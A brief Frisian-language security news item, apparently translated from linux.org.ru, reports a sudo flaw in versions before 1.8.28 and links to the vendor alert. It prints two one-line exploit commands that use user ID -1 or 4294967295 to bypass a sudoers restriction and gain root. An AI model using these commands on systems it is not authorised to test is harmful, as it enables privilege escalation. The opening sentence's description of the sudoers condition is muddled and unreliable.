In brek yn sudo lit jo elke útfierbere triem as root útfiere as /etc/sudoers it kin wurde útfierd troch oare brûkers en is ferbean foar root.
De eksploitaasje fan 'e flater is heul ienfâldich:
sudo -u#-1 id -u
of:
sudo -u#4294967295 id -u
De flater is oanwêzich yn alle ferzjes fan sudo foar 1.8.28
Details:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Boarne: linux.org.ru